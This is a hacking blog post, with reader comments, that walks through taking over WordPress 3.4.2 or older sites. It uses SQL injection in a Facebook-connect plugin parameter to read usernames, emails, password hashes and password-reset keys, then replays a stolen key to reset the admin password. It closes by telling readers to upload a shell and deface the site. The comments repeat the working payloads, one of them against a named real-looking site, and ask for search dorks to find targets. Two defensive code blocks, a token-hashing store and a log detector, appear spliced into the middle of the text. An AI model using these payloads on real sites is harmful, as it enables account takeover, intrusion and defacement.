Hacking Wordpress without hash cracking

Hey puntos, today I am back with a new post for you. This post is about hacking WordPress blogs without cracking their hashes.

As we all know, WordPress blogs now use a stronger algorithm to hash blog passwords, and these hashes are not easy to crack. The only method to crack these hashes is brute force, but brute force takes too much time.


Now let's get started --->

Things you need --->

1. WordPress version <= 3.4.2
2. A WordPress site vulnerable to SQL injection (make sure the version of the WP site is 3.4.2 or lower)

Let's start --->

Find a WordPress site vulnerable to SQLi.
For example, I got www.site.com?fbconnect_action=myhome&fbuserid=1

Now add this code after the WordPress site address:
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
Now the address will look like:
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
Let's start pwning.

First go to http://target.com/wp-login.php
Now click on "Lost your password?"

WordPress will now ask you for the username or email; enter the username or email ID which you got in the field and click get password.

Now it will say "Check your e-mail for the confirmation link."
What WordPress does now is send an activation key to the email address, and it also sets the value of the activation key in the database.

We will get the user activation key through SQLi; this is what it's all about.
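
The reset flow described above hinges on the database holding the activation key in a form that `wp-login.php?action=rp` accepts directly. As an added example (not WordPress code and not from the original post), the following stores only a hash of the reset token together with an issue time, so a value read out of the table cannot be replayed; `ResetStore`, `RESET_TTL` and `leaked_column_value` are hypothetical names.

```python
import hashlib
import hmac
import secrets
import time

RESET_TTL = 3600  # seconds a reset link stays valid (assumed policy, not from the page)


class ResetStore:
    """Hypothetical stand-in for the user_activation_key column."""

    def __init__(self):
        self.rows = {}  # login -> (sha256 hex digest of token, issued_at)

    def issue(self, login, now=None):
        """Create a token, persist only its hash, return the token for the e-mail."""
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self.rows[login] = (digest, time.time() if now is None else now)
        return token

    def redeem(self, login, presented, now=None):
        """Accept a token once, only if it hashes to the stored value and is fresh."""
        row = self.rows.get(login)
        if row is None:
            return False
        digest, issued_at = row
        now = time.time() if now is None else now
        candidate = hashlib.sha256(presented.encode()).hexdigest()
        ok = hmac.compare_digest(candidate, digest) and now - issued_at <= RESET_TTL
        if ok:
            del self.rows[login]  # single use: the row is cleared on success
        return ok


def leaked_column_value(store, login):
    """What a read-only SQL injection against this table would return."""
    return store.rows[login][0]
```

Presenting the leaked column value to `redeem()` fails because the server hashes whatever it is given before comparing.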



Add the column name user_activation_key to the query to extract it:
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--
Now you will be able to see the activation key

Now, finally, all we have to do is append the following URL to the end of the site address and edit it with your activation key and username:

wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

eg:- 
http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
WordPress will now ask you for your new password; enter your desired password and click change.

Now you will be able to login to site. 

Now upload shell and then deface it.
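
Seen from the server's side, the steps above leave a recognizable sequence in the access log: UNION SELECT requests against `wp_users`, a lost-password request, then a `wp-login.php?action=rp` request from the same client. The following is an added example (not from the original post) that flags that sequence; the log lines are constructed, and the function names and the combined-log layout are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines; IPs are documentation ranges, KEYHERE is the page's placeholder.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2016:10:00:01 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2016:10:01:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
198.51.100.7 - - [01/Jan/2016:10:01:30 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2016:10:02:05 +0000] "GET /wp-login.php?action=rp&key=KEYHERE&login=admin HTTP/1.1" 200 2048
203.0.113.20 - - [01/Jan/2016:11:00:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.20 - - [01/Jan/2016:11:05:00 +0000] "GET /wp-login.php?action=rp&key=KEYHERE&login=editor HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')
SQLI_RE = re.compile(
    r'union\s+(?:all\s+)?select\b.*?(?:wp_users|user_activation_key|user_pass)', re.S)
# Zero-width characters (such as the %E2%80%8B in the URLs above) are stripped before matching.
ZERO_WIDTH = dict.fromkeys(map(ord, '\u200b\u200c\u200d\ufeff'))


def classify(method, target):
    """Return the stage of the reset-key chain a request belongs to, or None."""
    decoded = unquote_plus(target).translate(ZERO_WIDTH).lower()
    path, _, query = decoded.partition('?')
    if SQLI_RE.search(query):
        return 'sqli'
    if path.endswith('/wp-login.php'):
        if method == 'POST' and 'action=lostpassword' in query:
            return 'reset_requested'
        if 'action=rp' in query and 'key=' in query:
            return 'reset_key_used'
    return None


def find_reset_chains(log_text):
    """Return (stages per client IP, IPs that used a reset key after SQLi)."""
    stages, flagged = {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target = m.groups()
        stage = classify(method, target)
        if stage is None:
            continue
        seen = stages.setdefault(ip, [])
        seen.append(stage)
        if stage == 'reset_key_used' and 'sqli' in seen and ip not in flagged:
            flagged.append(ip)
    return stages, flagged
```

The second client performs an ordinary password reset and is recorded but not flagged, since no injection request precedes its key use.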


Note -->
1. Only for educational purposes.
2. This hack only works on WordPress versions 3.4.2 or lower.

Source: Hack2play
Hacking Wordpress without hash cracking Reviewed by Aditya Joshi on 21:08:00 Rating: 5

26 comments:

  1. please add about joomla too

  2. sure bro i will try to post for joomla also :D

  3. can u give google dork for this

  4. Bro,please how are we going to know the version 3.4.2 when dorking it???

  5. Tested on WordPress 2.9.2; SQL works great, but it does not ask for a new password,
    instead it sends the new password to the email

    Replies
    1. Because this only works on WordPress versions 3.4.2 or less than it. Not in newer versions

  6. Add column name user_activation_key to extract

    http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--

    Now you will be able to see the activation key

    where i have to create a column name?
    tnks

  8. What others paths can you use except for this one?

    http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--

    For example, will something like this work?

    http://target.com/?page_id=1242+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--


    Or must it be an URL with the user ID in it?

  9. After this I didn't get any email ID in the field... please help me.
    http://songspoint.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_email,0x3a,user_pass%29%E2%80%8B,7,8,9,10,11,12

  11. Take into account that this hack will not work if the site is protected by ModSecurity or any other WAF, because they detect that SQLi attempt.

  12. Nice Tips, I Might Learned Some Things New, Thank For The Share.

    Regards,
    Raja Koppula.

  20. Where To Get The Email Bro

    Replies
    1. When you use the following SQL queries you will get the email and user ID: 1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--

    2. You have to add the code at the end, after the page URL, like
      http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--



All Rights Reserved by Cyber Sucks © 2015 - 2016
